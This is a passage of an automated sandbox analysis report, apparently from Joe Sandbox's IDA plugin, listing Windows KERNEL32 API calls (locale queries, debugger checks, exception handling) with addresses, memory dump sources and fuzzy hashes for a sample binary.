        • GetLocaleInfoW.KERNEL32(?,20001004,0010E046,00000002,00000000,?,?,?,0010E046,?,00000000), ref: 0010DDEA
        • GetACP.KERNEL32(?,?,0010E046,?,00000000), ref: 0010DDFF
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: InfoLocale
        • String ID: ACP$OCP
        • API String ID: 2299586839-711371036
        • Opcode ID: 93a25ab8ec256ffe9d154beb93977dd718e74721d2e6c7a6110726ddbf970784
        • Instruction ID: 985036c036193ae891d38992d7c21ba2a1fbdd5f3b535b40377bc2b94b21f33d
        • Opcode Fuzzy Hash: 93a25ab8ec256ffe9d154beb93977dd718e74721d2e6c7a6110726ddbf970784
        • Instruction Fuzzy Hash: E521D332700104E6DB399FD8EA00BA777A6EF50B60B578064E98ADB1C0F7B2DD80D790
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0010E009
        • IsValidCodePage.KERNEL32(00000000), ref: 0010E052
        • IsValidLocale.KERNEL32(?,00000001), ref: 0010E061
        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0010E0A9
        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0010E0C8
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
        • String ID:
        • API String ID: 415426439-0
        • Opcode ID: 685f86b02c4f2f52c3f3f3fc24ada26bb4db944eb8ca37a442fc682fa5652914
        • Instruction ID: 1eda1e812d5d4e00a9b32cc9285489ae739c511b1f1759b558e9872be04928c7
        • Opcode Fuzzy Hash: 685f86b02c4f2f52c3f3f3fc24ada26bb4db944eb8ca37a442fc682fa5652914
        • Instruction Fuzzy Hash: 5F518E71A00206ABDB14DFA5DC41ABAB7B8BF58700F048869F981EB1D1E7F09A418B61
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetACP.KERNEL32(?,?,?,?,?,?,00102903,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0010D65A
        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00102903,?,?,?,00000055,?,-00000050,?,?), ref: 0010D685
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0010D7E8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$CodeInfoLocalePageValid
        • String ID: utf8
        • API String ID: 607553120-905460609
        • Opcode ID: 303e4c0882863491b34e5ce0fbe4f7776dc098e4007e328025c9e27768c3f6dc
        • Instruction ID: 46f8a7dd69f9efd64d24cd5529d6ac6ca273fc9dc1fd0737b7215933fab1ffa7
        • Opcode Fuzzy Hash: 303e4c0882863491b34e5ce0fbe4f7776dc098e4007e328025c9e27768c3f6dc
        • Instruction Fuzzy Hash: D571E871600302AAD729ABB5EC86BBB77A8EF54704F14442AF585D71C1EBF1ED40CBA1
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: _strrchr
        • String ID:
        • API String ID: 3213747228-0
        • Opcode ID: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
        • Instruction ID: a79f71c0452925b8025b323ffcfbb1c6f576a8134f5cd54f98da683ec349b0d4
        • Opcode Fuzzy Hash: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
        • Instruction Fuzzy Hash: 9BB13632904A459FDB158F68C8817FFBBA7EF55340F158169E885EB282D3B49D41CFA0
        APIs
        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 000F7CD5
        • IsDebuggerPresent.KERNEL32 ref: 000F7DA1
        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000F7DBA
        • UnhandledExceptionFilter.KERNEL32(?), ref: 000F7DC4
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
        • String ID:
        • API String ID: 254469556-0
        • Opcode ID: 3c44edf08208ff73288b4d599929a36beaf80d1419debf9b7ab96fd7c9619f94
        • Instruction ID: c51eb5930ceb031b6b645d5d099f4c426a84cfa542342c59a4e3018f06fb6065
        • Opcode Fuzzy Hash: 3c44edf08208ff73288b4d599929a36beaf80d1419debf9b7ab96fd7c9619f94
        • Instruction Fuzzy Hash: 213105B5C0521CDADF20DFA4D949BDDBBB8BF08304F1041AAE50CAB250EB719A849F85
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0010DA00
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0010DA4A
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0010DB10
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: InfoLocale$ErrorLast
        • String ID:
        • API String ID: 661929714-0
        • Opcode ID: 322b082648c9839749ee2f45b8de748c544d2f1283435938de57bc3ae129e237
        • Instruction ID: 1fbd4b75c27b983602353252323807b533a3e345109e1592032d65497a84f1e9
        • Opcode Fuzzy Hash: 322b082648c9839749ee2f45b8de748c544d2f1283435938de57bc3ae129e237
        • Instruction Fuzzy Hash: BE61BE71A0420BDBEB28DF68EC82BAAB7A8EF15301F154179E985C75C5F7B4D980CB50
        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 000FBAFB
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 000FBB05
        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 000FBB12
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID:
        • API String ID: 3906539128-0
        • Opcode ID: 8ebf63dbca40dcc65a7dc553bf99a16ccce5ad4fcb5bd1bd7a79cc1b05db3e67
        • Instruction ID: 2543687b377288e09e1dc258c0711c4d15158b31b0dc9266f35dcb3d8e44a3cb
        • Opcode Fuzzy Hash: 8ebf63dbca40dcc65a7dc553bf99a16ccce5ad4fcb5bd1bd7a79cc1b05db3e67
        • Instruction Fuzzy Hash: 0C31C27490121C9BCB21DF68D988BDDBBB4BF08310F5041DAE51CA6251EB709F818F45
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 349bac49a2cf059cb2622c8f5045624a5e235da172517e6992a086ebdc4c2b38
        • Instruction ID: e7b6fa44e498600c45004f73b85dc0dfb128b497a1f2863d09f5f71bdd3cd626
        • Opcode Fuzzy Hash: 349bac49a2cf059cb2622c8f5045624a5e235da172517e6992a086ebdc4c2b38
        • Instruction Fuzzy Hash: 67F13E71E002199FDF15CFA8C990BADB7B1FF48314F158269E859AB381D770AE41CB90
        APIs
        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00104A96
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ExceptionRaise
        • String ID:
        • API String ID: 3997070919-0
        • Opcode ID: b8af45cb6e8385fc78166538da934a2722e076621582241bd68de28bb286f654
        • Instruction ID: 75d22d57e1c996d215060a7a58ec31e41fa751fe8d68beaab83e1650bd5d905e
        • Opcode Fuzzy Hash: b8af45cb6e8385fc78166538da934a2722e076621582241bd68de28bb286f654
        • Instruction Fuzzy Hash: 8AB11671610608DFD718CF28C4C6B657BA0FB49364F298658EADACF2E1C775E992CB40
        APIs
        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000F77B2
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: FeaturePresentProcessor
        • String ID:
        • API String ID: 2325560087-0
        • Opcode ID: a2d3feb7cb4e74f9e70c064c1264570f8fe8426ae94598deda0642b3923d4622
        • Instruction ID: 4584458d30372045d372d7b13660c68ae7ac5acc10ea5c9b573b3fc651fd8bfd
        • Opcode Fuzzy Hash: a2d3feb7cb4e74f9e70c064c1264570f8fe8426ae94598deda0642b3923d4622
        • Instruction Fuzzy Hash: BF519272904219CFEB15CF94DC857AABBF0FB48354F24852AD509EBB51D3B49980CB91
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 11907cf0b1f14f76f6b4471cd16b0d2aa1b9c7109bbcfff83a7118a943b57ba5
        • Instruction ID: ac30b14e85d76341ffb66bd14d87bd1113a155a0b49bc18b44b7c999bf1f47bf
        • Opcode Fuzzy Hash: 11907cf0b1f14f76f6b4471cd16b0d2aa1b9c7109bbcfff83a7118a943b57ba5
        • Instruction Fuzzy Hash: 4A41B1B5804218AFDF20DF69CC89AEABBB9EF49300F5442D9E448D3241DB759E848F50
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID: 0
        • API String ID: 0-4108050209
        • Opcode ID: 7b20df1781b90c238a9092cdaf01cb0194f73bd64abf14a3ea8c0c1cfcb51fee
        • Instruction ID: 90287dbeaa4372d9392487b253757a48c608f089e67a94fdbb891a561ba9f185
        • Opcode Fuzzy Hash: 7b20df1781b90c238a9092cdaf01cb0194f73bd64abf14a3ea8c0c1cfcb51fee
        • Instruction Fuzzy Hash: 6BC1DF70A0064ECFCB68CF68C4946BEBBF3AF05310F14461ED6569BA92C770AC45EB91
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0010DC53
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$InfoLocale
        • String ID:
        • API String ID: 3736152602-0
        • Opcode ID: ee258fceb55c07ac49a06865a55387115ae1f193b7411e9d411a1fedebe36486
        • Instruction ID: 3a1f1d326a2b9b5729a0b021caf136864bf5e89a4d4b11554fa1b4ce86df93e7
        • Opcode Fuzzy Hash: ee258fceb55c07ac49a06865a55387115ae1f193b7411e9d411a1fedebe36486
        • Instruction Fuzzy Hash: B621C576604206ABEB289F55ED42EBA77A8EF14310F14407DFE45C6181EBF5ED40DB50
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • EnumSystemLocalesW.KERNEL32(0010D9AC,00000001,00000000,?,-00000050,?,0010DFDD,00000000,?,?,?,00000055,?), ref: 0010D8F8
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$EnumLocalesSystem
        • String ID:
        • API String ID: 2417226690-0
        • Opcode ID: 846eb64228c50dd8b710cbd6f9a7ea6febbb4b06155c9057b0bd31ca8f1b3c62
        • Instruction ID: b5e37c727f270376926eebd7c038df12d81563d91023e9e5ed54cf93db5aa54c
        • Opcode Fuzzy Hash: 846eb64228c50dd8b710cbd6f9a7ea6febbb4b06155c9057b0bd31ca8f1b3c62
        • Instruction Fuzzy Hash: 2D110C3B2107059FDB189F79D8916BAB792FF84358B14842DE9C687A80D3B17942C740
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0010DBC8,00000000,00000000,?), ref: 0010DE5A
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$InfoLocale
        • String ID:
        • API String ID: 3736152602-0
        • Opcode ID: b848b2a44555d3fc6c34af5a3de6840613346c60b7eb5e3355594aedc52a841f
        • Instruction ID: bd75ce2b98c00fc4f6083c4717dfdb92a27c1249101344fa56362e7d575a72cd
        • Opcode Fuzzy Hash: b848b2a44555d3fc6c34af5a3de6840613346c60b7eb5e3355594aedc52a841f
        • Instruction Fuzzy Hash: ADF02836610212BBDB285BA0EC46BBBB768EB50754F150429EC86A71C0EBF4FE41C690
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0010D7E8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$InfoLocale
        • String ID: utf8
        • API String ID: 3736152602-905460609
        • Opcode ID: 2c7aa8634a7924cc9fdf854d9ef3c80d9b26c8ecd4d97eea95ceb1347ce6ba8f
        • Instruction ID: f2fe080594ea177ffd188ed05a5f7d2c0a235dff8d6c755ab4b39059943f64e1
        • Opcode Fuzzy Hash: 2c7aa8634a7924cc9fdf854d9ef3c80d9b26c8ecd4d97eea95ceb1347ce6ba8f
        • Instruction Fuzzy Hash: 41F0F436600105ABC728AB64EC46ABA37A8DF58350B014179F602D7281EBB4AD048750
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • EnumSystemLocalesW.KERNEL32(0010DBFF,00000001,?,?,-00000050,?,0010DFA1,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0010D96B
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$EnumLocalesSystem
        • String ID:
        • API String ID: 2417226690-0
        • Opcode ID: 438a480a9aa0dc0d8d01c1a9dea341dea1bd2f18210090445cfcccb0161724e9
        • Instruction ID: a093601f9c6457ebe960daea0519abb92243d7023617169503990bc22a9e5ce3
        • Opcode Fuzzy Hash: 438a480a9aa0dc0d8d01c1a9dea341dea1bd2f18210090445cfcccb0161724e9
        • Instruction Fuzzy Hash: 68F0C2762003045FDB245F79A882A7ABB91EF8576CB05846CF9854B6D0C7F1AC42C650
        APIs
          • Part of subcall function 000FE9A9: EnterCriticalSection.KERNEL32(-001705FF,?,00101531,00000000,0011F1E8,0000000C,001014F8,?,?,00104EE2,?,?,0010437E,00000001,00000364,00000001), ref: 000FE9B8
        • EnumSystemLocalesW.KERNEL32(001062BE,00000001,0011F3D8,0000000C,0010672D,00000000), ref: 00106303
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CriticalEnterEnumLocalesSectionSystem
        • String ID:
        • API String ID: 1272433827-0
        • Opcode ID: 386b0305ecd06fa250fd5bdb8f6bd218aab2dbb641340bba7c36ce84f6907957
        • Instruction ID: a9a397c3e2fa24eb6b4dfa15c76e2b0be0fd46f7a0aef76d710e50c3219d4e37
        • Opcode Fuzzy Hash: 386b0305ecd06fa250fd5bdb8f6bd218aab2dbb641340bba7c36ce84f6907957
        • Instruction Fuzzy Hash: 60F03776A14304EFD700EFA8E882B9D77F0FB48760F10416AE515DB6E1C7B55981CB50
        APIs
          • Part of subcall function 001041E0: GetLastError.KERNEL32(?,00000008,0010708C), ref: 001041E4
          • Part of subcall function 001041E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00104286
        • EnumSystemLocalesW.KERNEL32(0010D794,00000001,?,?,?,0010DFFF,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0010D872
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$EnumLocalesSystem
        • String ID:
        • API String ID: 2417226690-0
        • Opcode ID: e7490479fc3e5d37d19c74b4d3910aab981f444c7debd622d859309394cfb0ed
        • Instruction ID: 706d38f576e94d04f3ca57e8212682ec135be87795664149714109b323f8ac9d
        • Opcode Fuzzy Hash: e7490479fc3e5d37d19c74b4d3910aab981f444c7debd622d859309394cfb0ed
        • Instruction Fuzzy Hash: 6DF0E53A70020557CB189F75EC4676ABF94FFC1764B468059EA458B690C7B19982C790
        APIs
        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00103469,?,20001004,00000000,00000002,?,?,00102A6B), ref: 00106865
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: InfoLocale
        • String ID:
        • API String ID: 2299586839-0
        • Opcode ID: 413d0a5b1112ef557406c0d9fc355c57c24ef1b219f48e436f73d84158f1d668
        • Instruction ID: 7d1c222930444a7d81fce64982fd01a43e133d9d165e8cc5e50494dd0276265e
        • Opcode Fuzzy Hash: 413d0a5b1112ef557406c0d9fc355c57c24ef1b219f48e436f73d84158f1d668
        • Instruction Fuzzy Hash: ECE04F3154062CBBCF162F61ED05B9E3F16EF54761F048421FD45695A0CBF18D30AAD4
        APIs
        • SetUnhandledExceptionFilter.KERNEL32(Function_00007E31,000F72C3), ref: 000F7E2A
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
